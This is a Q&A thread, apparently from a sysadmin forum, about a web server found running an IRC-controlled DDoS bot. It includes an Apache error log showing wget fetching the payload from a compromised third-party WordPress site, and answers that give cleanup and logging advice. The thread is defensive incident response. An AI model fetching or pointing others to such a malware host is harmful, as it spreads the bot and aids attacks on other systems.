4

My provider informed that there is an outbound attack on my web server. On further inspection I saw this in my Apache error.log file:

--2012-02-04 04:40:59--  http://www.luxelivingforum.com/wp-content/themes/lifestyle/run
Resolving www.luxelivingforum.com... 184.168.113.199
Connecting to www.luxelivingforum.com|184.168.113.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68338 (67K) [text/plain]
Saving to: `./run'

     0K .......... .......... .......... .......... .......... 74% 61.8K 0s
    50K .......... ......                                     100% 11.1M=0.8s

2012-02-04 04:41:01 (82.4 KB/s) - `./run' saved [68338/68338]
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 174.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 211.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 244.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 251.

What could the above thing mean ?

Ladadadada
  • 25,847
  • 7
  • 57
  • 90
Proy
  • 43
  • 2

2 Answers2

7

Your server must have been compromised and is now being remotely commanded to launch attacks. You should recover your last uncompromised backup and immediately patch your wordpress installation. You must monitor the security advisories for wordpress (and wordpress pluguins) on a daily basis.

drcelus
  • 1,233
  • 4
  • 14
  • 27
  • The URL you see there is not my server. That appeared in my servers log file. Check this link to know how it shows in my web server logs http://pastebin.com/CezEDf0v – Proy Feb 04 '12 at 09:58
  • 2
    Your server is downloading the file `http://www.luxelivingforum.com/wp-content/themes/lifestyle/run` and executing it. The file is a perl script encoded in base64. Your server is **hacked**. – drcelus Feb 04 '12 at 10:02
  • The bot code was pulled down from someone else's compromised Wordpress installation. The error log shows that Proy is running Python. – Ladadadada Feb 04 '12 at 10:03
  • Yes correct. There are more than 30 web applications running on this server. The platforms covered are Django/php/perl. My servers access logs for each vhost is different. But the error logs are all pointing to the same one. Because of this I am not able to identify which web site is the one which has the faulty code. – Proy Feb 04 '12 at 10:08
  • 4
    If you run lots of different domains, adding `%{Host}i` to your LogFormat directive can be a very good idea. – Ladadadada Feb 04 '12 at 10:21
  • You should carefully scan your logs to find the vulnerable software. +1 for the logs directive tip. – drcelus Feb 04 '12 at 10:21
  • You know the exact timestamp: `04:40:59` so grep through all your access logs for that timestamp. You may have to grep a few seconds either side of that due to the way Apache logs timestamps. – Ladadadada Feb 04 '12 at 10:27
  • Any ideas on what the bot.pl is trying to do after connecting to IRC? – Proy Feb 04 '12 at 11:23
  • It receives targets to run DDoS against from an IRC channel. I haven't gone through all the code but it seems it can also download and execute random files. – drcelus Feb 04 '12 at 11:58
  • 1
    I'm not sure what else there is to do here. drcelus is right, your server is hacked. It doesn't matter which application has been compromised, you can't trust any of them at the moment. I'd flatten the server and restore from last known good backup. I realise that's not what you want to hear, but its the only way to be certain. You could take an image of the system as it stands first if you wanted to continue analysing the hack, but I'd not hang about on fixing it. – Rob Moir Feb 04 '12 at 12:01
  • See also : http://serverfault.com/questions/218005/my-servers-been-hacked-emergency – Rob Moir Feb 04 '12 at 12:02
0

That doesn't look like the sort of thing that should be in an Apache error log. Are you (or is your hosting provider) sending your logs through syslog ?

In any case, you have a clear indication of a compromise here. The file in question is a bot of some sort (I haven't had time to analyse it myself yet) and is probably running on your system right now and attacking other people's systems.

Two things you should do straight away, even before the standard advice of "wipe everything, reinstall from backups" is to find the pid of the bot using ps -ef | grep bot.pl and then kill it using kill -9 <the pid you found>. You may also want to delete the bot code which will be called "bot.pl". You can probably find it with locate bot.pl.

The bot doesn't look particularly clever or sophisticated and doesn't seem to have done anything to hide its tracks. After killing it and deleting the bot code, you are probably clean. But you can never be sure once you have been compromised until you do the wipe-and-reinstall procedure.

The last thing you should do is to try and figure out how they got in so you can close the hole. If you do the wipe-and-install, make sure to keep a copy of all your logs for analysis later. The Apache access logs for the same time period should give you a hint as to what they did.

Ladadadada
  • 25,847
  • 7
  • 57
  • 90
  • Good news: if it can't connect to IRC, it won't do anything at all. As long as you have unknown outbound connections blocked at your firewall, you won't have attacked anyone else. You **do** have unknown outbound connections blocked don't you ? – Ladadadada Feb 04 '12 at 10:09
  • The bot code is a self destructing one, If you open the link in a browser towards the end the bot removes its files itself. My main problem is I need to identify my web site which has the faulty code. I suspect a PHP based website hosted on my server since PHP has always given me security issues. – Proy Feb 04 '12 at 10:13
  • His provider is warning that he has an ongoing outbound attack. – drcelus Feb 04 '12 at 10:13
  • A quick look at `bot.pl` shows that it is a one-trick pony. It does DDoS attacks and is controlled by IRC. – Ladadadada Feb 04 '12 at 10:15
  • Yes, I wrote that before I had actually uncompressed the tar file. It turns out that `bot.pl` is inside the `bot` directory and hence it does get deleted. – Ladadadada Feb 04 '12 at 10:17
  • The **big** problem here is what triggers the download of the bot. Maybe a vulnerable script installed somewhere on the server. The apache logs must show something. – drcelus Feb 04 '12 at 10:19
  • I have verified all the outgoing ports that are allowed from the server. Have blocked everything thats looks strange. only smtp is now allowed to outside. Thanks Ladadadada . @drcelus I am now going to separate the error logs for all my web sites and see if the error shows up again. – Proy Feb 04 '12 at 10:24